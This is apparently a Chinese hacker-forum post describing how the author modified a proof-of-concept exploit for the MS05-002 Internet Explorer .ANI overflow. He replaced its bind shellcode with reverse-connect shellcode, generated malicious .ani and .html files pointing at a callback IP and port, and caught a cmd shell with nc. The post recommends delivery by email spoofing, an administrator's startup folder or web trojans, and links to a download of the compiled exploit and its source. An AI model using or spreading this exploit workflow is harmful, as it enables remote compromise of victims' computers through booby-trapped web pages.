信息来源:邪恶八进制 中国
漏洞详细资料可以去下面的这个地址下载:
http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx
拿到代码后,仔细阅读了一下代码.原代码是采用了本地邦定的shellcode.实战性太差,又由于本漏洞和以前的那个IEFRAME TAG溢出漏洞有一些相似点.比如由于溢出后产生的shell继承了IE的权限,而此权限取决于运行IE的用户,因此利用此漏洞提升权限的可能性就很小了.不过,也不是不可能,比如邮件欺骗,或者放到管理员账户自启动的文件夹里等等.因此我修改了部分源代码,去掉了本定邦定的shellcode,换上了反向链接的shellcode.
程序运行界面如下:
很简单的利用方法.首先我们先用这个程序来生成溢出文件:
H:/temp/c/lcc>ms05002 test 10.0.0.138 1314
(MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit Copyright (c) 2004-2005 .: houseofdabus :. rewritten by 无敌最寂寞@EST Tested on all affected systems: This is provided as proof-of-concept code only for educational purposes and test Creating test.ani file ... Ok Creating test.html file ... Ok |
生成后,用nc监听本定端口1314,然后用IE打开溢出文件test.html(打开方法有多钟,实战中看个人发挥,我这里为了直观,是先打开IE然后从菜单中打开test.html的,打开后IE僵死,弹出一新的cmd窗口,接着nc得到一个cmd shell,测试图如下:
到此此漏洞测试完毕.我附上修改后以编译好的文件和源代码.谢谢大家的支持!
http://neeao.com/lbs/attachments/month_200501/23_204557_c02gms05002.rar
补充一点的是,这个跟以前的那个IEFRAME TAG溢出漏洞利用上的很大的不同之处就是,IEFRAME tag 采用的触发方法是暴力扩大内存的方法,因此会造成内存的非常大的消耗...很容易造成机器假死或者当机.但是此漏洞不同,他只是会造成IE的死掉,但并不会占用大量内存 .所以巧妙的运用到网页木马上有的时候也会有奇效!